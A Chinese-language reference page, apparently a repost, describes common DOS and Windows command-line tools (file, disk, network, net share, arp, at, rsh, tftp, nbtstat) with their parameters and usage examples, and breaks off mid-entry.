DOS 常用命令
dir 列文件名 deltree 刪除目錄樹 cls 清屏 cd 改變當(dāng)前目錄
copy 拷貝文件 diskcopy 復(fù)制磁盤 del 刪除文件 format 格式化磁盤
edit 文本編輯 mem 查看內(nèi)存狀況 md 建立子目錄 move 移動(dòng)文件、改目錄名
more 分屏顯示 type 顯示文件內(nèi)容 rd 刪除目錄 sys 制作DOS系統(tǒng)盤
ren 改變文件名 xcopy 拷貝目錄與文件 chkdsk 檢查磁盤 attrib 設(shè)置文件屬性
fdisk 硬盤分區(qū) date 顯示及修改日期 label 設(shè)置卷標(biāo)號(hào) defrag 磁盤碎片整理
msd 系統(tǒng)檢測(cè) path 設(shè)置搜尋目錄 share 文件共享 memmaker內(nèi)存優(yōu)化管理
help 幫助 restore 恢復(fù)備份文件 set 設(shè)置環(huán)境變量 time 顯示及修改時(shí)間
tree 列目錄樹 debug 隨機(jī)調(diào)試程序 doskey 重新調(diào)用DOS命令 prempt 設(shè)置提示符 undelete恢復(fù)被刪的文件 scandisk檢測(cè)、修理磁盤

不常用DOS命令
diskcomp磁盤比較　 append 設(shè)置非執(zhí)行文件路徑
expand 還原DOS文件 fasthelp快速顯示幫助信息
fc 文件比較 interink啟動(dòng)服務(wù)器
setver 設(shè)置版本 intersvr啟動(dòng)客戶機(jī)
subst 路徑替換 qbasic Basic集成環(huán)境
vsafe 防病毒 unformat恢復(fù)已格式化的磁盤
ver 顯示DOS版本號(hào) smartdrv設(shè)置磁盤加速器
vol 顯示磁盤卷標(biāo)號(hào) lh 將程序裝入高端內(nèi)存
ctty 改變控制設(shè)備 emm386 擴(kuò)展內(nèi)存管理
常用命令具體介紹:

?

一、Dir

?

顯示目錄文件和子目錄列表，呵呵，這個(gè)當(dāng)然是人人要知道的。
可以使用通配符（? 和 *），？表通配一個(gè)字符，*表通配任意字符
*.后綴
指定要查看后綴的文件。 上面其實(shí)也可以為“ . 后綴”,例如dir *.exe 等于dir .exe
/p
每次顯示一個(gè)列表屏幕。要查看下一屏，請(qǐng)按鍵盤上的任意鍵。
/w
以寬格式顯示列表，在每一行上最多顯示 5 個(gè)文件名或目錄名。
/s
列出指定目錄及所有子目錄中出現(xiàn)的每個(gè)指定的文件名。比win環(huán)境下的查找快多了
dir *.* -> a.txt 把當(dāng)前目錄文件列表寫入a.txt
dir *.* /s -> a.txt 把當(dāng)前目錄文件列表寫入a.txt，包括子目錄下文件。

?

二、Attrib

?

顯示、設(shè)置或刪除指派給文件或目錄的只讀、存檔、系統(tǒng)以及隱藏屬性。如果在不含參數(shù)的情況下使用，則 attrib 會(huì)顯示當(dāng)前目錄中所有文件的屬性。
+r
設(shè)置只讀屬性。
-r
清除只讀屬性。
+a
設(shè)置存檔文件屬性。
-a
清除存檔文件屬性。
+s
設(shè)置系統(tǒng)屬性。
-s
清除系統(tǒng)屬性。
+h
設(shè)置隱藏屬性。
-h
清除隱藏屬性。
三、Cls

?

清除顯示在命令提示符窗口中的所有信息，并返回空窗口，即“清屏”

?

四、Exit
退出當(dāng)前命令解釋程序并返回到系統(tǒng)。

?

五、format
格式化
/q
執(zhí)行快速格式化。刪除以前已格式化卷的文件表和根目錄，但不在扇區(qū)之間掃描損壞區(qū)域。使用 /q 命令行選項(xiàng)應(yīng)該僅格式化以前已格式化的完好的卷。

?

六、Ipconfig
顯示所有當(dāng)前的 TCP/IP 網(wǎng)絡(luò)配置值、刷新動(dòng)態(tài)主機(jī)配置協(xié)議 (DHCP) 和域名系統(tǒng) (DNS) 設(shè)置。使用不帶參數(shù)的 ipconfig 可以顯示所有適配器的 IP 地址、子網(wǎng)掩碼、默認(rèn)網(wǎng)關(guān)。
/all
顯示所有適配器的完整 TCP/IP 配置信息。
ipconfig 等價(jià)于 winipcfg，后者在ME、98 和 95 上可用。盡管 Windows XP 沒有提供象 winipcfg 命令一樣的圖形化界面，但可以使用“網(wǎng)絡(luò)連接”查看和更新 IP 地址。要做到這一點(diǎn)，請(qǐng)打開 網(wǎng)絡(luò)連接，右鍵單擊某一網(wǎng)絡(luò)連接，單擊“狀態(tài)”，然后單擊“支持”選項(xiàng)卡。

該命令最適用于配置為自動(dòng)獲取 IP 地址的計(jì)算機(jī)。它使用戶可以確定哪些 TCP/IP 配置值是由 DHCP、自動(dòng)專用 IP 地址 (APIPA) 和其他配置配置的。?

七、md
創(chuàng)建目錄或子目錄

?

八、Move
將一個(gè)或多個(gè)文件從一個(gè)目錄移動(dòng)到指定的目錄。

?

九、Nbtstat
顯 示本地計(jì)算機(jī)和遠(yuǎn)程計(jì)算機(jī)的基于 TCP/IP (NetBT) 協(xié)議的 NetBIOS 統(tǒng)計(jì)資料、NetBIOS 名稱表和 NetBIOS 名稱緩存。Nbtstat 可以刷新 NetBIOS 名稱緩存和注冊(cè)的 Windows Internet 名稱服務(wù) (WINS) 名稱。使用不帶參數(shù)的 nbtstat 顯示幫助。Nbtstat 命令行參數(shù)區(qū)分大小寫。
-a remotename
顯示遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 名稱表，其中，RemoteName 是遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 計(jì)算機(jī)名稱。
-A IPAddress
顯示遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 名稱表，其名稱由遠(yuǎn)程計(jì)算機(jī)的 IP 地址指定（以小數(shù)點(diǎn)分隔）。

?

十、Netstat
顯 示活動(dòng)的 TCP 連接、計(jì)算機(jī)偵聽的端口、以太網(wǎng)統(tǒng)計(jì)信息、IP 路由表、IPv4 統(tǒng)計(jì)信息（對(duì)于 IP、ICMP、TCP 和 UDP 協(xié)議）以及 IPv6 統(tǒng)計(jì)信息（對(duì)于 IPv6、ICMPv6、通過 IPv6 的 TCP 以及通過 IPv6 的 UDP 協(xié)議）。使用時(shí)如果不帶參數(shù)，netstat 顯示活動(dòng)的 TCP 連接。
-a
顯示所有活動(dòng)的 TCP 連接以及計(jì)算機(jī)偵聽的 TCP 和 UDP 端口。
十一、Ping
通 過發(fā)送“網(wǎng)際消息控制協(xié)議 (ICMP)”回響請(qǐng)求消息來驗(yàn)證與另一臺(tái) TCP/IP 計(jì)算機(jī)的 IP 級(jí)連接。回響應(yīng)答消息的接收情況將和往返過程的次數(shù)一起顯示出來。Ping 是用于檢測(cè)網(wǎng)絡(luò)連接性、可到達(dá)性和名稱解析的疑難問題的主要 TCP/IP 命令。如果不帶參數(shù)，ping 將顯示幫助。名稱和Ip地址解析是它的最簡單應(yīng)用也是用的最多的。
-t
指定在中斷前 ping 可以持續(xù)發(fā)送回響請(qǐng)求信息到目的地。要中斷并顯示統(tǒng)計(jì)信息，請(qǐng)按 CTRL-BREAK。要中斷并退出 ping，請(qǐng)按 CTRL-C。
-lSize
指定發(fā)送的回響請(qǐng)求消息中“數(shù)據(jù)”字段的長度（以字節(jié)表示）。默認(rèn)值為 32。size 的最大值是 65,527。

?

十二、Rename (Ren)
更改文件的名稱。
例如 ren *.abc *.cba

?

十三、Set
顯示、設(shè)置或刪除環(huán)境變量。如果沒有任何參數(shù)，set 命令將顯示當(dāng)前環(huán)境設(shè)置。

?

十四、Shutdown
允許您關(guān)閉或重新啟動(dòng)本地或遠(yuǎn)程計(jì)算機(jī)。如果沒有使用參數(shù)，shutdown 將注銷當(dāng)前用戶。
-m ComputerName
指定要關(guān)閉的計(jì)算機(jī)。
-t xx
將用于系統(tǒng)關(guān)閉的定時(shí)器設(shè)置為 xx 秒。默認(rèn)值是 20 秒。
-l
注銷當(dāng)前用戶，這是默認(rèn)設(shè)置。-m ComputerName 優(yōu)先。
-s
關(guān)閉本地計(jì)算機(jī)。
-r
關(guān)閉之后重新啟動(dòng)。
-a
中止關(guān)閉。除了 -l 和 ComputerName 外，系統(tǒng)將忽略其它參數(shù)。在超時(shí)期間，您只可以使用 -a。

?

十五、System File Checker (sfc)
win下才有，在重新啟動(dòng)計(jì)算機(jī)后掃描和驗(yàn)證所有受保護(hù)的系統(tǒng)文件。
/scannow
立即掃描所有受保護(hù)的系統(tǒng)文件。
/scanonce
一次掃描所有受保護(hù)的系統(tǒng)文件。
/purgecache
立即清除“Windows 文件保護(hù)”文件高速緩存，并掃描所有受保護(hù)的系統(tǒng)文件。
/cachesize=x
設(shè)置“Windows 文件保護(hù)”文件高速緩存的大小，以 MB 為單位。

?

十六、type
顯示文本文件的內(nèi)容。使用 type 命令查看文本文件或者是bat文件而不修改文件

?

十七、Tree
圖像化顯示路徑或驅(qū)動(dòng)器中磁盤的目錄結(jié)構(gòu)。

?

十八、Xcopy
復(fù)制文件和目錄，包括子目錄。
/s
復(fù)制非空的目錄和子目錄。如果省略 /s，xcopy 將在一個(gè)目錄中工作。
/e
復(fù)制所有子目錄，包括空目錄。

?

十九、copy
將一個(gè)或多個(gè)文件從一個(gè)位置復(fù)制到其他位置

?

二十、del
刪除指定文件。
ftp和bat批命令和net和telnet由于子命令太多，這里不說了，不過這幾個(gè)都是常用到的。
網(wǎng)絡(luò)常用命令：

?

1.最基本，最常用的，測(cè)試物理網(wǎng)絡(luò)的
ping 192.168.10.88 －t ，參數(shù)－t是等待用戶去中斷測(cè)試

?

2.查看DNS、IP、Mac等
A.Win98：winipcfg
B.Win2000以上：Ipconfig/all

?

C.NSLOOKUP：如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 則將DNS改為了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68

?

Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212

?

3.網(wǎng)絡(luò)信使
Net send 計(jì)算機(jī)名/IP|* (廣播) 傳送內(nèi)容，注意不能跨網(wǎng)段
net stop messenger 停止信使服務(wù)，也可以在面板－服務(wù)修改
net start messenger 開始信使服務(wù)

?

4.探測(cè)對(duì)方對(duì)方計(jì)算機(jī)名，所在的組、域及當(dāng)前用戶名
ping －a IP －t ，只顯示NetBios名
nbtstat -a 192.168.10.146 比較全的

?

5.netstat -a 顯示出你的計(jì)算機(jī)當(dāng)前所開放的所有端口
netstat -s -e 比較詳細(xì)的顯示你的網(wǎng)絡(luò)資料，包括TCP、UDP、ICMP 和 IP的統(tǒng)計(jì)等

?

6.探測(cè)arp綁定（動(dòng)態(tài)和靜態(tài)）列表，顯示所有連接了我的計(jì)算機(jī)，顯示對(duì)方IP和MAC地址
arp -a

?

7.在代理服務(wù)器端
捆綁IP和MAC地址，解決局域網(wǎng)內(nèi)盜用IP：
ARP －s 192.168.10.59 00－50－ff－6c－08－75
解除網(wǎng)卡的IP與MAC地址的綁定：
arp -d 網(wǎng)卡IP

?

8.在網(wǎng)絡(luò)鄰居上隱藏你的計(jì)算機(jī)
net config server /hidden:yes
net config server /hidden:no 則為開啟

?

9.幾個(gè)net命令
A.顯示當(dāng)前工作組服務(wù)器列表 net view，當(dāng)不帶選項(xiàng)使用本命令時(shí)，它就會(huì)顯示當(dāng)前域或網(wǎng)絡(luò)上的計(jì)算機(jī)上的列表。
比如：查看這個(gè)IP上的共享資源，就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享資源
資源共享名 類型 用途 注釋
--------------------------------------
網(wǎng)站服務(wù) Disk
命令成功完成。

?

B.查看計(jì)算機(jī)上的用戶帳號(hào)列表 net user
C.查看網(wǎng)絡(luò)鏈接 net use
例如：net use z: \\192.168.10.8\movie 將這個(gè)IP的movie共享目錄映射為本地的Z盤

?

D.記錄鏈接 net session
例如：
C:\>net session
計(jì)算機(jī) 用戶名 客戶類型 打開空閑時(shí)間
-------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12

?

\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。

?

10.路由跟蹤命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計(jì)算丟失包的％

?

11.關(guān)于共享安全的幾個(gè)命令
A.查看你機(jī)器的共享資源 net share
B.手工刪除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一個(gè)共享：
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同時(shí)限制鏈接用戶數(shù)為1人。

?

12.在DOS行下設(shè)置靜態(tài)IP
A.設(shè)置靜態(tài)IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地鏈接" static IP地址 mask gateway
B.查看IP設(shè)置
interface ip>show address

?

Arp
顯 示和修改"地址解析協(xié)議 (ARP)"緩存中的項(xiàng)目。ARP 緩存中包含一個(gè)或多個(gè)表，它們用于存儲(chǔ) IP 地址及其經(jīng)過解析的以太網(wǎng)或令牌環(huán)物理地址。計(jì)算機(jī)上安裝的每一個(gè)以太網(wǎng)或令牌環(huán)網(wǎng)絡(luò)適配器都有自己單獨(dú)的表。如果在沒有參數(shù)的情況下使用，則 arp 命令將顯示幫助信息。

?

語法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

?

參數(shù)
-a [InetAddr] [-N IfaceAddr]
顯 示所有接口的當(dāng)前 ARP 緩存表。要顯示指定 IP 地址的 ARP 緩存項(xiàng)，請(qǐng)使用帶有 InetAddr 參數(shù)的 arp -a，此處的 InetAddr 代表指定的 IP 地址。要顯示指定接口的 ARP 緩存表，請(qǐng)使用 -N IfaceAddr 參數(shù)，此處的 IfaceAddr 代表分配給指定接口的 IP 地址。-N 參數(shù)區(qū)分大小寫。
-g [InetAddr] [-N IfaceAddr]
與 -a 相同。
-d InetAddr [IfaceAddr]
刪 除指定的 IP 地址項(xiàng)，此處的 InetAddr 代表 IP 地址。對(duì)于指定的接口，要?jiǎng)h除表中的某項(xiàng)，請(qǐng)使用 IfaceAddr 參數(shù)，此處的 IfaceAddr 代表分配給該接口的 IP 地址。要?jiǎng)h除所有項(xiàng)，請(qǐng)使用星號(hào) (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 緩存添加可將 IP 地址 InetAddr 解析成物理地址 EtherAddr 的靜態(tài)項(xiàng)。要向指定接口的表添加靜態(tài) ARP 緩存項(xiàng)，請(qǐng)使用 IfaceAddr 參數(shù)，此處的 IfaceAddr 代表分配給該接口的 IP 地址。
/?
在命令提示符顯示幫助。
注釋
InetAddr 和 IfaceAddr 的 IP 地址用帶圓點(diǎn)的十進(jìn)制記數(shù)法表示。
物理地址 EtherAddr 由六個(gè)字節(jié)組成，這些字節(jié)用十六進(jìn)制記數(shù)法表示并且用連字符隔開（比如，00-AA-00-4F-2A-9C）。
通過 -s 參數(shù)添加的項(xiàng)屬于靜態(tài)項(xiàng)，它們不會(huì) ARP 緩存中超時(shí)。如果終止 TCP/IP 協(xié)議后再啟動(dòng)，這些項(xiàng)會(huì)被刪除。要?jiǎng)?chuàng)建永久的靜態(tài) ARP 緩存項(xiàng)，請(qǐng)?jiān)谂幚砦募惺褂眠m當(dāng)?shù)?arp 命令并通過"計(jì)劃任務(wù)程序"在啟動(dòng)時(shí)運(yùn)行該批處理文件。
只有當(dāng)網(wǎng)際協(xié)議 (TCP/IP) 協(xié)議在 網(wǎng)絡(luò)連接中安裝為網(wǎng)絡(luò)適配器屬性的組件時(shí)，該命令才可用。
范例
要顯示所有接口的 ARP 緩存表，可鍵入：

?

arp -a

?

對(duì)于指派的 IP 地址為 10.0.0.99 的接口，要顯示其 ARP 緩存表，可鍵入：

?

arp -a -N 10.0.0.99

?

要添加將 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的靜態(tài) ARP 緩存項(xiàng)，可鍵入： arp -s 10.0.0.80 00-AA-00-4F-2A-9C

?

13.At
計(jì)劃在指定時(shí)間和日期在計(jì)算機(jī)上運(yùn)行命令和程序。at 命令只能在"計(jì)劃"服務(wù)運(yùn)行時(shí)使用。如果在沒有參數(shù)的情況下使用，則 at 列出已計(jì)劃的命令。

?

語法
at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]

?

at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command]

?

參數(shù)
\\computername
指定遠(yuǎn)程計(jì)算機(jī)。如果省略該參數(shù)，則 at 計(jì)劃本地計(jì)算機(jī)上的命令和程序。
ID
指定指派給已計(jì)劃命令的識(shí)別碼。
/delete
取消已計(jì)劃的命令。如果省略了 ID，則計(jì)算機(jī)中所有已計(jì)劃的命令將被取消。
/yes
刪除已計(jì)劃的事件時(shí)，對(duì)來自系統(tǒng)的所有詢問都回答"是"。
hours:minutes
指定命令運(yùn)行的時(shí)間。該時(shí)間用 24 小時(shí)制（即從 00:00 [午夜] 到 23:59）的 小時(shí): 分鐘格式表示。
/interactive
對(duì)于在運(yùn)行 command 時(shí)登錄的用戶,允許 command 與該用戶的桌面進(jìn)行交互。
/every:
在每個(gè)星期或月的指定日期（例如，每個(gè)星期四，或每月的第三天）運(yùn)行 command 命令。
date
指定運(yùn)行命令的日期。可以指定一周的某日或多日（即，鍵入 M、T、W、Th、F、S、Su）或一個(gè)月中的某日或多日（即，鍵入從 1 到31 之間的數(shù)字）。用逗號(hào)分隔多個(gè)日期項(xiàng)。如果省略了 date，則 at 使用該月的當(dāng)前日。
/next:
在下一個(gè)指定日期（比如，下一個(gè)星期四）到來時(shí)運(yùn)行 command。
command
指定要運(yùn)行的 Windows 命令、程序（.exe 或 .com 文件）或批處理程序（.bat 或 .cmd 文件）。當(dāng)命令需要路徑作為參數(shù)時(shí)，請(qǐng)使用絕對(duì)路徑，也就是從驅(qū)動(dòng)器號(hào)開始的整個(gè)路徑。如果命令在遠(yuǎn)程計(jì)算機(jī)上，請(qǐng)指定服務(wù)器和共享名的通用命名協(xié)定 (UNC) 符號(hào)，而不是遠(yuǎn)程驅(qū)動(dòng)器號(hào)。
/?
在命令提示符顯示幫助。
注釋
Schtasks 是功能更為強(qiáng)大的超集命令行計(jì)劃工具，它含有 at 命令行工具中的所有功能。對(duì)于所有的命令行計(jì)劃任務(wù)，都可以使用 schtasks 來替代 at。有關(guān) schtasks 的詳細(xì)信息，請(qǐng)參閱"相關(guān)主題"。

?

使用 at
使用 at 命令時(shí)，要求您必須是本地 Administrators 組的成員。

?

加載 Cmd.exe
在運(yùn)行命令之前，At 不會(huì)自動(dòng)加載 Cmd.exe （命令解釋器）。如果沒有運(yùn)行可執(zhí)行文件 (.exe)，則在命令開頭必須使用如下所示的方法專門加載 Cmd.exe：

?

cmd /c dir > c:\test.out。

?

查看已計(jì)劃的命令
當(dāng)不帶命令行選項(xiàng)使用 at 時(shí)，計(jì)劃任務(wù)會(huì)出現(xiàn)在類似于以下格式的表中：

?

Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
包含標(biāo)識(shí)號(hào) (ID)
當(dāng)在命令提示下使用帶有標(biāo)識(shí)號(hào) (ID) 的 at 命令時(shí)，單個(gè)任務(wù)項(xiàng)的信息會(huì)顯示在類似于下面的格式中：

?

Task ID： 1

?

Status:OK

?

Schedule:Each F

?

Time of Day:4:30 PM

?

Command:net send group leads status due當(dāng)計(jì)劃帶有 at 的命令（尤其是帶有命令行選項(xiàng)的命令）后，要通過鍵入不帶命令行選項(xiàng)的 at 來檢查該命令語法是否輸入正確。如果顯示在"命令行"列中的信息不正確，請(qǐng)刪除該命令，然后重新鍵入它。如果還不正確，則可以在重新鍵入該命令時(shí)讓它少帶些命令行選項(xiàng)。 查看結(jié)果
使 用 at 的已經(jīng)計(jì)劃的命令作為后臺(tái)程序運(yùn)行。運(yùn)行結(jié)果不會(huì)顯示在計(jì)算機(jī)上。要將輸出重定向到文件，請(qǐng)使用重定向符號(hào) (>)。如果將輸出重定向到文件，則不論是在命令行還是在批處理文件中使用 at，都需要在重定向符號(hào)之前使用轉(zhuǎn)義符 (^)。例如，要重定向輸出到 Output.text 文件，則要鍵入：

?

at 14:45 c:\test.bat ^>c:\output.txt

?

執(zhí)行命令的當(dāng)前目錄為 systemroot 文件夾。

?

更改系統(tǒng)時(shí)間
在使用 at 命令計(jì)劃了要運(yùn)行的命令之后，如果更改了計(jì)算機(jī)的系統(tǒng)時(shí)間，則通過鍵入不帶命令行選項(xiàng)的 at 可使 at 計(jì)劃程序與修改后的系統(tǒng)時(shí)間同步。

?

存儲(chǔ)命令
已計(jì)劃的命令存儲(chǔ)在注冊(cè)表中。這樣，如果重新啟動(dòng)"計(jì)劃"服務(wù)，則不會(huì)丟失計(jì)劃任務(wù)。

?

連接到網(wǎng)絡(luò)驅(qū)動(dòng)器
對(duì)于需要訪問網(wǎng)絡(luò)的計(jì)劃作業(yè)，請(qǐng)不要使用已重新定向的驅(qū)動(dòng)器。"計(jì)劃"服務(wù)可能無法訪問這些重定向的驅(qū)動(dòng)器，或者，在該計(jì)劃任務(wù)運(yùn)行時(shí)如果有其他用戶登錄，則這些重定向的驅(qū)動(dòng)器可能不會(huì)出現(xiàn)。因此，對(duì)于計(jì)劃作業(yè)，請(qǐng)使用 UNC 路徑。例如：

?

at 1:00pm my_backup \\server\share

?

請(qǐng)不要使用下述語法（其中 x: ?表示由用戶建立的連接）：

?

at 1:00pm my_backup x:

?

如果計(jì)劃了一個(gè)使用驅(qū)動(dòng)器號(hào)的 at 命令來連接共享目錄，則應(yīng)包含一個(gè) at 命令以使在完成該驅(qū)動(dòng)器的使用時(shí)斷開與驅(qū)動(dòng)器的連接。如果不能斷開與驅(qū)動(dòng)器的連接，則在命令提示下，所指派的驅(qū)動(dòng)器號(hào)將不可用。

?

范例
要顯示 Marketing 服務(wù)器上已計(jì)劃的命令列表，請(qǐng)鍵入：

?

at \\marketing
要了解服務(wù)器 Corp 上標(biāo)識(shí)號(hào)為 3 的命令的詳細(xì)信息，請(qǐng)鍵入：

?

at \\corp 3
要計(jì)劃在上午 8:00 于 Corp 服務(wù)器上運(yùn)行網(wǎng)絡(luò)共享命令，并將該列表重定向到 Maintenance 服務(wù)器的 Corp.txt 文件（位于 Reports 共享目錄下）中，請(qǐng)鍵入：

?

at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt"
為了在每五天后的午夜將 Marketing 服務(wù)器的硬盤驅(qū)動(dòng)器備份到磁帶驅(qū)動(dòng)器，首先創(chuàng)建名為 Archive.cmd 的批處理程序（它含有備份命令），然后計(jì)劃該批處理程序的運(yùn)行，為此請(qǐng)鍵入：

?

at \\marketing 00:00 /every:5,10,15,20,25,30 archive
要取消當(dāng)前服務(wù)器上已計(jì)劃的所有命令，請(qǐng)按下述方法清除 at 計(jì)劃信息：

?

at /delete
如果要運(yùn)行的命令不是可執(zhí)行 (.exe) 文件，請(qǐng)按如下所示的方法在該命令之前使用 cmd /c 來加載 Cmd.exe：

?

cmd /c dir > c:\test.out。
14.Rsh
在 運(yùn)行 RSH 服務(wù)的遠(yuǎn)程計(jì)算機(jī)上運(yùn)行命令。Windows XP 和 Windows 2000 不提供 RSH 服務(wù)。Windows 2000 Server Resource Kit 提供名為 Rshsvc.exe 的 RSH 服務(wù)。使用不帶參數(shù)的 rsh 顯示幫助。

?

語法
rsh [Host] [-l UserName] [-n] [Command]

?

參數(shù)
Host
指定運(yùn)行 command 的遠(yuǎn)程計(jì)算機(jī)。
-l UserName
指定遠(yuǎn)程計(jì)算機(jī)上使用的用戶名。在省略情況下，使用當(dāng)前登錄用戶的名稱。
-n
將 rsh 的輸入重定向到 NULL 設(shè)備。這防止本地計(jì)算機(jī)命令結(jié)果的顯示。
Command
指定要運(yùn)行的命令。
/?
在命令提示符顯示幫助。
注釋
標(biāo)準(zhǔn)操作
rsh 命令將標(biāo)準(zhǔn)輸入復(fù)制到遠(yuǎn)程 command，將遠(yuǎn)程 command 的標(biāo)準(zhǔn)輸出復(fù)制到其標(biāo)準(zhǔn)輸出，將遠(yuǎn)程 command 的標(biāo)準(zhǔn)錯(cuò)誤復(fù)制到其標(biāo)準(zhǔn)錯(cuò)誤。Rsh 通常在遠(yuǎn)程命令終止時(shí)終止。

?

使用重定向符號(hào)
為了使重定向在遠(yuǎn)程計(jì)算機(jī)上發(fā)生，要以引號(hào)引住重定向符號(hào)（例如 ">>"）。如果不使用引號(hào)，重定向會(huì)在本地計(jì)算機(jī)發(fā)生。例如，以下命令將遠(yuǎn)程文件"RemoteFile"附加到本地文件"LocalFile"中：

?

rsh othercomputer cat remotefile >> localfile

?

以下命令將遠(yuǎn)程文件 Remotefile 附加到遠(yuǎn)程文件 otherremotefile 中：

?

rsh othercomputer cat remotefile ">>" otherremotefile

?

使用 rsh
在使用已登錄到某個(gè)域并且運(yùn)行 Windows XP Professional 的計(jì)算機(jī)時(shí)，該域的主域控制器必須可用于確認(rèn)用戶名或 rsh 命令失敗。

?

.rhosts 文件
.rhosts 文件通常許可 UNIX 系統(tǒng)的網(wǎng)絡(luò)訪問權(quán)限。.rhosts 文件列出可以訪問遠(yuǎn)程計(jì)算機(jī)的計(jì)算機(jī)名及關(guān)聯(lián)的登錄名。在正確配置了 .rhosts 文件的遠(yuǎn)程計(jì)算機(jī)上運(yùn)行 rcp、rexec 或 rsh 命令時(shí)，您不必提供遠(yuǎn)程計(jì)算機(jī)的登錄和密碼信息。

?

.rhosts 文件是一個(gè)文本文件，該文件中每一行為一個(gè)條目。條目由本地計(jì)算機(jī)名、本地用戶名和有關(guān)該條目的所有注釋組成。每個(gè)條目均由制表符或空格分開，注釋用符號(hào) (#) 打頭。例如：

?

host7 #This computer is in room 31A

?

.rhosts 文件必須在遠(yuǎn)程計(jì)算機(jī)的用戶主目錄中。有關(guān)遠(yuǎn)程計(jì)算機(jī) .rhosts 文件特定執(zhí)行的詳細(xì)信息，請(qǐng)參閱遠(yuǎn)程系統(tǒng)的文檔。

?

只有當(dāng)網(wǎng)際協(xié)議 (TCP/IP) 協(xié)議在 網(wǎng)絡(luò)連接中安裝為網(wǎng)絡(luò)適配器屬性的組件時(shí)，該命令才可用。
范例
要以名稱 admin1 在遠(yuǎn)程計(jì)算機(jī) vax1 上執(zhí)行 telcon 命令，請(qǐng)鍵入：

?

rsh vax1 -l admin1 telcon

?

15.Tftp
向運(yùn)行平凡文件傳輸協(xié)議 (TFTP) 服務(wù)或 daemon 的遠(yuǎn)程計(jì)算機(jī)（尤其是運(yùn)行 UNIX 的計(jì)算機(jī)）傳輸文件或從運(yùn)行平凡文件傳輸協(xié)議 (TFTP) 服務(wù)或 daemon 的遠(yuǎn)程計(jì)算機(jī)（尤其是運(yùn)行 UNIX 的計(jì)算機(jī)）傳輸文件。

?

語法
tftp [-i] [Host] [{get | put}] [Source] [Destination]

?

參數(shù)
-i
指 定二進(jìn)制圖像傳送模式（也稱為八進(jìn)制模式）。在二進(jìn)制圖像模式下，文件以一個(gè)字節(jié)為單位進(jìn)行傳輸。在傳送二進(jìn)制文件時(shí)使用該模式。如果省略了 -i，文件將以 ASCII 模式傳送。這是默認(rèn)的傳送模式。該模式將行尾 (EOL) 字符轉(zhuǎn)換為指定計(jì)算機(jī)的適當(dāng)格式。傳送文本文件時(shí)使用該模式。如果文件傳送成功，將顯示數(shù)據(jù)傳輸率。
Host
指定本地或遠(yuǎn)程計(jì)算機(jī)。
put
將本地計(jì)算機(jī)上的 Destination 文件傳送到遠(yuǎn)程計(jì)算機(jī)上的 Source 文件。因?yàn)?TFTP 協(xié)議不支持用戶身份驗(yàn)證，所以用戶必須登錄到遠(yuǎn)程計(jì)算機(jī)，同時(shí)文件在遠(yuǎn)程計(jì)算機(jī)上必須可寫。
get
將遠(yuǎn)程計(jì)算機(jī)上的 Destination 文件傳送到本地計(jì)算機(jī)上的 Source 文件。
Source
指定要傳送的文件。
Destination
指定將文件傳送到的位置。如果省略了 Destination，將假定它與 Source 同名。
/?
在命令提示符顯示幫助。
注釋
使用 get 參數(shù)
如果將本地計(jì)算機(jī)上的文件 FileTwo 傳送到遠(yuǎn)程計(jì)算機(jī)上的文件 FileOne，則指定 put。如果將遠(yuǎn)程計(jì)算機(jī)上的文件 FileTwo 傳送到遠(yuǎn)程計(jì)算機(jī)上的文件 FileOne，則指定 get。

?

Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服務(wù)器。Windows 2000 提供的 TFTP 服務(wù)器服務(wù)只為 Windows XP 和 Windows 2000 客戶端計(jì)算機(jī)提供遠(yuǎn)程引導(dǎo)功能。
只有當(dāng)網(wǎng)際協(xié)議 (TCP/IP) 協(xié)議在 網(wǎng)絡(luò)連接中安裝為網(wǎng)絡(luò)適配器屬性的組件時(shí)，該命令才可用。
范例
要從本地計(jì)算機(jī)將文件 Users.txt 傳送到遠(yuǎn)程計(jì)算機(jī) vax1 上的 Users19.txt，請(qǐng)鍵入：

?

tftp vax1 put users.txt users19.txt
16.Nbtstat
顯 示本地計(jì)算機(jī)和遠(yuǎn)程計(jì)算機(jī)的基于 TCP/IP (NetBT) 協(xié)議的 NetBIOS 統(tǒng)計(jì)資料、NetBIOS 名稱表和 NetBIOS 名稱緩存。Nbtstat 可以刷新 NetBIOS 名稱緩存和注冊(cè)的 Windows Internet 名稱服務(wù) (WINS) 名稱。使用不帶參數(shù)的 nbtstat 顯示幫助。

?

語法
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]

?

參數(shù)
-a remotename
顯示遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 名稱表，其中，RemoteName 是遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 計(jì)算機(jī)名稱。NetBIOS 名稱表是運(yùn)行在該計(jì)算機(jī)上的應(yīng)用程序使用的 NetBIOS 名稱列表。
-A IPAddress
